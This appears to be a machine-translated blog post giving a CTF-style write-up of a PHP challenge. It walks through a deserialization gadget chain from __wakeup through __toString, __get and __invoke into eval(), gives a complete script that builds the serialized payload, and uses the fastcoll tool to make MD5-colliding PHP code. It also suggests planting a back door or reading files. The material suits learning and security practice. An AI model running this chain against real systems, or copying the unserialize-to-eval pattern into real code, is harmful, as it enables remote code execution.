当前位置:网站首页>PHP deserialization +md5 collision
PHP deserialization +md5 collision
2022-07-05 20:49:00 【Game programming】
PHP Deserialization +MD5 Collision
Source code :
<?phperror_reporting(0);highlight_file(__FILE__);class Backdoor { public $x; public $y; public function __invoke(){ if( is_string($this->x) && is_string($this->y) && ($this->x != $this->y) && (md5($this->x) === md5($this->y)) ){ if(!preg_match("/\<\?/", $this->x, $match)){ eval($this->x); } else { die("No Way!"); } } else { die("Keep it up......"); } }}class Entrance{ public $name; public $str; public function __construct(){ $this->name = "Bunny"; } public function __toString(){ return $this->str->name; } public function __wakeup(){ echo 'Welcome, '.$this->name."<br>"; }}class Test{ public $z; public function __construct(){ $this->z = array(); } public function __get($key){ $function = $this->z; return $function(); }}if (isset($_GET['poc'])){ unserialize($_GET['poc']);}?>
analysis :
First , from unserialize It is obvious that this is about PHP The problem of deserialization , This kind of problem usually needs to find an entry first .
After checking the code , Soon found a PHP Magic methods __wakeup()
.
__wakeup():
unserialize()
Will check if there is one__wakeup()
Method . If there is , Will be called first__wakeup
Method ,
Although this method simply outputs a sentence , But careful observation will find __wakeup()
There is another one above the magic method __toString()
The magic of .
__toString():
The response method when a class is treated as a string .
__toString() How to respond when a class is treated as a string . for exampleecho $obj;
What should be shown .
From this we can guess , You can assign this class to $this->name, This will trigger when he splices strings __toString()
Magic methods .
Take a closer look at __toString
The content of magic method ,$this->str->name, From this guess, we can assign a class to $this->str, Then go to that kind of name This variable .
Look back at the source code , Find out test There is one in the class __get()
The magic of .
__get():
PHP in __get(), Call when you get a member variable of a class
stay php In object oriented programming , The member property of the class is set to private after , If we try to call it outside, it will appear “ Cannot access a private property ” Error of . So in order to solve this problem , We can use magic __get().
Combine the above steps , We can give test Add a private variable to the class name, This will trigger when getting private variables __get()
Magic methods .
Look again. __get()
The content of magic method , He return One. $function(), and $function = $this->z, In this place, it is easy to think of operations performed by using classes as functions , Then check the code , It was found that __invoke()
Magic methods .
__invoke():
__invoke(), The response method when an object is called by calling a function
** effect :**
When trying to call an object as a function ,__invoke() Method will be called automatically .
** Be careful :**
This feature only exists in PHP 5.3.0 And above are valid .
__invoke()
Magic method has filtering operation , It requires x and y The value of must be a string , Their two values are not equal , however MD5 The value should be the same , Finally, it will x As PHP Code to execute , That is what we will eventually use eval() function !
The whole process is almost like this , If you can't see it directly , You can also look back and forward , That is to find places that may be used and push forward .
answer :
structure poc chain
<?phpclass Entrance{ public $name; public $str;}class Test{ public $z; private $name;}class Backdoor { public $x; public $y;}$a=new Entrance();$b=new Test();$c=new Backdoor();$a->name=$a; // Used to trigger tostring$a->str=$b; // Used to trigger get$b->z=$c; // Used to trigger invoke$c->x=file_get_contents("1_msg1.txt");$c->y=file_get_contents("1_msg2.txt");echo urlencode(serialize($a));// There will be invisible characters in plaintext output , So remember url Encoding ?>
The chain is not difficult , as long as 3 Step by step , This question is difficult at the end MD5 Hit this , Casually find two MD5 Strings with the same value are not difficult , But also treat this string as PHP Code to execute , It may not be easy .
It's definitely not good to try one by one , Here we have to use a tool fastcoll.
Download resources
Program :http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
Source code :http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
The function of this tool is that you give him a string , He will output you two segments containing the string and MD5 Files with the same value , With this tool , This question is very simple .
Let's do a random test , use PHP Code output 99999.
First prepare a 1.txt, The content of the document is
echo 999999;
Drag the file to fastcoll.exe On , The program will automatically generate two paragraphs of text .
After checking the text, I found , The code is followed by many garbled strings , So we can add notes after the original document , So modify 1.txt
echo 999999;//
throw sth. into fastcoll Two files are generated in , Because there is garbled code in this file , So it is suggested to use file_get_contents To get the contents of the file .
test result :
thus eval Function executed successfully , Finally, you can try to leave the back door , Or read the file directly .
author :Sentry_fei
Game programming , A game development favorite ~
If the picture is not displayed for a long time , Please use Chrome Kernel browser .
边栏推荐
- Which securities is better for securities account opening? Is online account opening safe?
- 如何让化工企业的ERP库存账目更准确
- The Chinese Academy of Management Sciences gathered industry experts, and Fu Qiang won the title of "top ten youth" of think tank experts
- Is the securities account given by the school of Finance and business safe? Can I open an account?
- How to renew NPDP? Here comes the operation guide!
- ts 之 类的简介、构造函数和它的this、继承、抽象类、接口
- Applet event binding
- leetcode:1139. 最大的以 1 为边界的正方形
- Hongmeng OS' fourth learning
- ClickHouse 复制粘贴多行sql语句报错
猜你喜欢
Abnova CRISPR spcas9 polyclonal antibody protocol
Cutting edge technology for cultivating robot education creativity
CVPR 2022 | common 3D damage and data enhancement
教你自己训练的pytorch模型转caffe(三)
mysql全面解析json/数组
How to form standard interface documents
Prosci LAG-3 recombinant protein specification
Applet global configuration
Abnova丨荧光染料 620-M 链霉亲和素方案
Duchefa cytokinin dihydrozeatin (DHZ) instructions
随机推荐
Codeforces Round #804 (Div. 2) - A, B, C
中国管理科学研究院凝聚行业专家,傅强荣获智库专家“十佳青年”称号
Simple understanding of interpolation search
小程序全局配置
当Steam教育进入个性化信息技术课程
Typhoon is coming! How to prevent typhoons on construction sites!
Duchefa丨S0188盐酸大观霉素五水合物中英文说明书
The Chinese Academy of Management Sciences gathered industry experts, and Fu Qiang won the title of "top ten youth" of think tank experts
培养机器人教育创造力的前沿科技
phpstudy小皮的mysql点击启动后迅速闪退,已解决
E. Singhal and numbers (prime factor decomposition)
如何让化工企业的ERP库存账目更准确
The development of research tourism practical education helps the development of cultural tourism industry
2.<tag-哈希表, 字符串>补充: 剑指 Offer 50. 第一个只出现一次的字符 dbc
手机开户股票开户安全吗?我家比较偏远,有更好的开户途径么?
Cutting edge technology for cultivating robot education creativity
【刷题记录】1. 两数之和
Abnova total RNA Purification Kit for cultured cells Chinese and English instructions
Duchefa MS medium contains vitamin instructions
ProSci LAG3抗体的化学性质和应用说明